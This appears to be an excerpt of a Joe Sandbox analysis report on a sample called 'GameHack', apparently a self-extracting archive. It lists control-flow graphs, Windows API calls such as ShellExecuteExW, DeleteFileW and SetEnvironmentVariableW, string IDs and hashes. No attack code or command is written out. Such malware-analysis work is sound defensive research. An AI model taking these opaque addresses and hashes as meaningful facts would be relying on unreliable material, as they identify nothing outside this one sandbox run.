473->478 479 eec1c7-eec1e2 473->479 476->489 478->472 478->479 492 eec22c-eec233 479->492 493 eec1e4-eec21e 479->493 486 eec0f8-eec100 call ef7168 480->486 487 eec0f3-eec0f5 480->487 481->427 488 eec109-eec110 call ef35ce 481->488 486->481 487->486 488->427 507 eec2bc-eec2c0 489->507 508 eec2c7-eec318 call edfe56 call eea8d0 GetDlgItem SetWindowTextW SendMessageW call 
ef35e9 489->508 499 eec235-eec24d call ef35b3 492->499 500 eec261-eec284 call ef35b3 * 2 492->500 528 eec222-eec224 493->528 529 eec220 493->529 514 eebf0b-eebf1f SetFileAttributesW 497->514 515 eec060-eec06f call eda4b3 497->515 499->500 522 eec24f-eec25c call edfe2e 499->522 500->489 534 eec286-eec294 call edfe2e 500->534 507->508 513 eec2c2-eec2c4 507->513 540 eec31d-eec321 508->540 513->508 516 eebfc5-eebfd5 GetFileAttributesW 514->516 517 eebf25-eebf58 call edb4f7 call edb207 call ef35b3 514->517 515->427 516->497 526 eebfd7-eebfe6 DeleteFileW 516->526 549 eebf5a-eebf69 call ef35b3 517->549 550 eebf6b-eebf79 call edb925 517->550 522->500 526->497 533 eebfe8-eebfeb 526->533 528->492 529->528 537 eebfef-eec01b call ed400a GetFileAttributesW 533->537 534->489 547 eebfed-eebfee 537->547 548 eec01d-eec033 MoveFileW 537->548 540->427 544 eec327-eec33b SendMessageW 540->544 544->427 547->537 548->497 551 eec035-eec03f MoveFileExW 548->551 549->550 556 eebf7f-eebfbe call ef35b3 call eef350 549->556 550->515 550->556 551->497 556->516
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00EEBDFA
                                        • Part of subcall function 00EEAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00EEAAFE
                                      • SetWindowTextW.USER32(?,?), ref: 00EEC127
                                      • _wcsrchr.LIBVCRUNTIME ref: 00EEC2B1
                                      • GetDlgItem.USER32(?,00000066), ref: 00EEC2EC
                                      • SetWindowTextW.USER32(00000000,?), ref: 00EEC2FC
                                      • SendMessageW.USER32(00000000,00000143,00000000,00F1A472), ref: 00EEC30A
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EEC335
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                      • API String ID: 3564274579-312220925
                                      • Opcode ID: bb8ad0ccd64ebab9ad9c2b9bc7cb40d629d7fcb07bc067558dbd53c9b5ad47b7
                                      • Instruction ID: bae3955e988ff50fb791a50d1ddd66f492a1a3e4e042499f284b580a7f304ea9
                                      • Opcode Fuzzy Hash: bb8ad0ccd64ebab9ad9c2b9bc7cb40d629d7fcb07bc067558dbd53c9b5ad47b7
                                      • Instruction Fuzzy Hash: 85E18F72D0465CAADB25EBA1DC45DEF73BCEF08314F1050A6F609F31A1EB709A859B50

                                      Control-flow Graph

                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00EDD346
                                      • _wcschr.LIBVCRUNTIME ref: 00EDD367
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00EDD328,?), ref: 00EDD382
                                      • __fprintf_l.LIBCMT ref: 00EDD873
                                        • Part of subcall function 00EE137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00EDB652,00000000,?,?,?,00010486), ref: 00EE1396
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                      • API String ID: 4184910265-980926923
                                      • Opcode ID: 80e3c148643190e77eb1502dfc65c3c0dc8e21d16ffc8210620b36b91d289b77
                                      • Instruction ID: 98bb698e92263897b41774d26265325d8373a6ba55a242ba6147ab1cfebd943b
                                      • Opcode Fuzzy Hash: 80e3c148643190e77eb1502dfc65c3c0dc8e21d16ffc8210620b36b91d289b77
                                      • Instruction Fuzzy Hash: FB12C1719042199ACF24DFA4DC81BEEB7B9EF44304F10656BF616B7381EB719A42CB60

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00EEAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EEAC85
                                        • Part of subcall function 00EEAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EEAC96
                                        • Part of subcall function 00EEAC74: IsDialogMessageW.USER32(00010486,?), ref: 00EEACAA
                                        • Part of subcall function 00EEAC74: TranslateMessage.USER32(?), ref: 00EEACB8
                                        • Part of subcall function 00EEAC74: DispatchMessageW.USER32(?), ref: 00EEACC2
                                      • GetDlgItem.USER32(00000068,00F2ECB0), ref: 00EECB6E
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00EEA632,00000001,?,?,00EEAECB,00F04F88,00F2ECB0), ref: 00EECB96
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00EECBA1
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00F035B4), ref: 00EECBAF
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EECBC5
                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00EECBDF
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EECC23
                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00EECC31
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EECC40
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EECC67
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00F0431C), ref: 00EECC76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID: \
                                      • API String ID: 3569833718-2967466578
                                      • Opcode ID: 66a404063b8d7a768ec73458d41a3e53c3f5fbbad6b25a60834300bfc8472b62
                                      • Instruction ID: 983035121d8146c2ba414fabe2ae39a1644777efac7a909606cf854d8b98026c
                                      • Opcode Fuzzy Hash: 66a404063b8d7a768ec73458d41a3e53c3f5fbbad6b25a60834300bfc8472b62
                                      • Instruction Fuzzy Hash: 2A3104B1188349BFE301DF20DC4AFAB7FADEB82714F000508F65096191DB645A09EB76

                                      Control-flow Graph

                                      APIs
                                      • FindResourceW.KERNEL32(00EEAE4D,PNG,?,?,?,00EEAE4D,00000066), ref: 00EE9E2E
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E46
                                      • LoadResource.KERNEL32(00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E59
                                      • LockResource.KERNEL32(00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E64
                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00EEAE4D,00000066), ref: 00EE9E82
                                      • GlobalLock.KERNEL32(00000000), ref: 00EE9E93
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00EE9EB7
                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00EE9EFC
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EE9F1B
                                      • GlobalFree.KERNEL32(00000000), ref: 00EE9F22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                      • String ID: PNG
                                      • API String ID: 3656887471-364855578
                                      • Opcode ID: e23def08e0a9764704139a8a5401efbe2d3af51d428d98ab30f2a6114d346a6a
                                      • Instruction ID: e0c032314b2cb136ded503a44abd25240ddd5ed0ec0ea0decd492517ac47a6de
                                      • Opcode Fuzzy Hash: e23def08e0a9764704139a8a5401efbe2d3af51d428d98ab30f2a6114d346a6a
                                      • Instruction Fuzzy Hash: 5A318F7160435AABC7109F22DC4896BBBEDFF89755B044518F902E3262EB71DC00EBA1

                                      Control-flow Graph

                                      APIs
                                      • ShellExecuteExW.SHELL32(?), ref: 00EECF54
                                      • ShowWindow.USER32(?,00000000), ref: 00EECF93
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00EECFCF
                                      • CloseHandle.KERNEL32(?), ref: 00EECFF5
                                      • ShowWindow.USER32(?,00000001), ref: 00EED084
                                        • Part of subcall function 00EE17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00EDBB05,00000000,.exe,?,?,00000800,?,?,00EE85DF,?), ref: 00EE17C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                      • String ID: $.exe$.inf
                                      • API String ID: 3686203788-2452507128
                                      • Opcode ID: 28070d417fba79b127f7c7ef5162515fbda216ce040e882f21b743eb082d3c43
                                      • Instruction ID: 6e7adc13fe74a8bcd37e7a293ad45de6a464f1ac1e2172c09ded95ef054c0a27
                                      • Opcode Fuzzy Hash: 28070d417fba79b127f7c7ef5162515fbda216ce040e882f21b743eb082d3c43
                                      • Instruction Fuzzy Hash: 1C6117715083C89AD731DF66D8006BB7BEAEF85308F18681EF5C0B7260D7B18986DB52

                                      Control-flow Graph

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00EF4E35,00EF4E35,?,?,?,00EFA2A9,00000001,00000001,3FE85006), ref: 00EFA0B2
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00EFA2A9,00000001,00000001,3FE85006,?,?,?), ref: 00EFA138
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00EFA232
                                      • __freea.LIBCMT ref: 00EFA23F
                                        • Part of subcall function 00EF8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EFC13D,00000000,?,00EF67E2,?,00000008,?,00EF89AD,?,?,?), ref: 00EF854A
                                      • __freea.LIBCMT ref: 00EFA248
                                      • __freea.LIBCMT ref: 00EFA26D
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: 7a7a75b611660a70d136c78811cf4831633235530e421ce66d3bf4731876eb23
                                      • Instruction ID: 16c590909e7cac64ba9d41767b1a0c962a5cbf544b50b1a3ea48763305480fe0
                                      • Opcode Fuzzy Hash: 7a7a75b611660a70d136c78811cf4831633235530e421ce66d3bf4731876eb23
                                      • Instruction Fuzzy Hash: C451E3F271020AAFEB258F64CC41EBB77AAEB44754F195239FE08EA151DB35DC408661

                                      Control-flow Graph

                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00ED78AD,?,00000005,?,00000011), ref: 00ED9A4C
                                      • GetLastError.KERNEL32(?,?,00ED78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00ED9A59
                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00ED78AD,?,00000005,?), ref: 00ED9A8E
                                      • GetLastError.KERNEL32(?,?,00ED78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00ED9A96
                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00ED78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00ED9ADB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLast$Time
                                      • String ID:
                                      • API String ID: 1999340476-0
                                      • Opcode ID: eb852364518915381c9b5ff0134489601eed06404baa71a3f4727a812b64396c
                                      • Instruction ID: 72ef4dc155b1e16b4fa1ab36081aff4fefeb8aaf3b9e589f6773d7921a0c2106
                                      • Opcode Fuzzy Hash: eb852364518915381c9b5ff0134489601eed06404baa71a3f4727a812b64396c
                                      • Instruction Fuzzy Hash: F04135315447466FE3209B20CC05BDABBD4FB05328F10171AF9E4A62D2E775A98ACB95

                                      Control-flow Graph

                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EEAC85
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EEAC96
                                      • IsDialogMessageW.USER32(00010486,?), ref: 00EEACAA
                                      • TranslateMessage.USER32(?), ref: 00EEACB8
                                      • DispatchMessageW.USER32(?), ref: 00EEACC2
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: ef97efe3d6565f7e6cb9399bffd12727fbb7c3802b105018c748f59fd30a7b9e
                                      • Instruction ID: 102721dfbcb9c555197fbad5c3b6c8e5fc8ff2e0e0478fdd4df18165499bf181
                                      • Opcode Fuzzy Hash: ef97efe3d6565f7e6cb9399bffd12727fbb7c3802b105018c748f59fd30a7b9e
                                      • Instruction Fuzzy Hash: FAF030B1D0112DABCB649BE2EC4CDEFBF6DEE052A17444419F805D2110EB34E409DBB1

                                      Control-flow Graph

                                      control_flow_graph 999 eea2c7-eea2e6 GetClassNameW 1000 eea30e-eea310 999->1000 1001 eea2e8-eea2fd call ee17ac 999->1001 1003 eea31b-eea31f 1000->1003 1004 eea312-eea315 SHAutoComplete 1000->1004 1006 eea2ff-eea30b FindWindowExW 1001->1006 1007 eea30d 1001->1007 1004->1003 1006->1007 1007->1000
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000050), ref: 00EEA2DE
                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00EEA315
                                        • Part of subcall function 00EE17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00EDBB05,00000000,.exe,?,?,00000800,?,?,00EE85DF,?), ref: 00EE17C2
                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00EEA305
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                      • String ID: EDIT
                                      • API String ID: 4243998846-3080729518
                                      • Opcode ID: 50a63cfd42d398293f62c4f92a4119d0f5b570fc00129492ddb4be725178f972
                                      • Instruction ID: b9add1e1ef51c73bac4e4a13ebfa2ec4efdd820f9a4a0893d3d6a3e34e66f4b3
                                      • Opcode Fuzzy Hash: 50a63cfd42d398293f62c4f92a4119d0f5b570fc00129492ddb4be725178f972
                                      • Instruction Fuzzy Hash: 1BF02772A0122C77E7305625AC09FDF73AC9F46B10F080066BE04F3180D760AD45D6F6

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00EE0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EE00A0
                                        • Part of subcall function 00EE0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00EDEB86,Crypt32.dll,00000000,00EDEC0A,?,?,00EDEBEC,?,?,?), ref: 00EE00C2
                                      • OleInitialize.OLE32(00000000), ref: 00EEA34E
                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00EEA385
                                      • SHGetMalloc.SHELL32(00F18430), ref: 00EEA38F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                      • String ID: riched20.dll
                                      • API String ID: 3498096277-3360196438
                                      • Opcode ID: a3c05e673d011155fa1901af946028a4c5a8be94655f23824364d2b8f6c106e3
                                      • Instruction ID: d84d9343b2fab2b45e890cbb1f345dc6a35bb4d3b6e4754a00286c9fe30f0c04
                                      • Opcode Fuzzy Hash: a3c05e673d011155fa1901af946028a4c5a8be94655f23824364d2b8f6c106e3
                                      • Instruction Fuzzy Hash: F1F049B1C0020EABCB50AF9AD8499EFFBFCEF94311F00415AE914E2200DBB456499BA1

                                      Control-flow Graph

                                      control_flow_graph 1012 eed287-eed2b2 call eee360 SetEnvironmentVariableW call edfbd8 1016 eed2b7-eed2bb 1012->1016 1017 eed2df-eed2e3 1016->1017 1018 eed2bd-eed2c1 1016->1018 1019 eed2ca-eed2d1 call edfcf1 1018->1019 1022 eed2c3-eed2c9 1019->1022 1023 eed2d3-eed2d9 SetEnvironmentVariableW 1019->1023 1022->1019 1023->1017
                                      APIs
                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00EED29D
                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00EED2D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 1431749950-3493335439
                                      • Opcode ID: fa9f478675b6c4553511439ef583a344762acf65a0a0e2216878f799beaf21cd
                                      • Instruction ID: ae4c570b96aee0e10655fc7c070b43d526fe15b0e23807955a39ed3ed827df78
                                      • Opcode Fuzzy Hash: fa9f478675b6c4553511439ef583a344762acf65a0a0e2216878f799beaf21cd
                                      • Instruction Fuzzy Hash: 6BF0A07280522CE6DB206F919C0ABFEBBACEF0DB41B005112FD85B6261D660CD40EAF1

                                      Control-flow Graph

                                      control_flow_graph 1024 ed984e-ed985a 1025 ed985c-ed9864 GetStdHandle 1024->1025 1026 ed9867-ed987e ReadFile 1024->1026 1025->1026 1027 ed98da 1026->1027 1028 ed9880-ed9889 call ed9989 1026->1028 1029 ed98dd-ed98e2 1027->1029 1032 ed988b-ed9893 1028->1032 1033 ed98a2-ed98a6 1028->1033 1032->1033 1034 ed9895 1032->1034 1035 ed98a8-ed98b1 GetLastError 1033->1035 1036 ed98b7-ed98bb 1033->1036 1039 ed9896-ed98a0 call ed984e 1034->1039 1035->1036 1040 ed98b3-ed98b5 1035->1040 1037 ed98bd-ed98c5 1036->1037 1038 ed98d5-ed98d8 1036->1038 1037->1038 1041 ed98c7-ed98d0 GetLastError 1037->1041 1038->1029 1039->1029 1040->1029 1041->1038 1043 ed98d2-ed98d3 1041->1043 1043->1039
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00ED985E
                                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00ED9876
                                      • GetLastError.KERNEL32 ref: 00ED98A8
                                      • GetLastError.KERNEL32 ref: 00ED98C7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: 586e8bb034be96cd84decfed1fc9d85d6eeeab6541da69dc49b06ed5a28e29ee
                                      • Instruction ID: 20c47a3c7c53842997a77570fd8e3ad00bf44e62becccaeaecec92f985c8ef78
                                      • Opcode Fuzzy Hash: 586e8bb034be96cd84decfed1fc9d85d6eeeab6541da69dc49b06ed5a28e29ee
                                      • Instruction Fuzzy Hash: 8A11A738900308EFDB285B51CC0466977ACFB02B38F10A12BF41AA6741D7759D42BF51
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00EDCFE0,00000000,00000000,?,00EFA49B,00EDCFE0,00000000,00000000,00000000,?,00EFA698,00000006,FlsSetValue), ref: 00EFA526
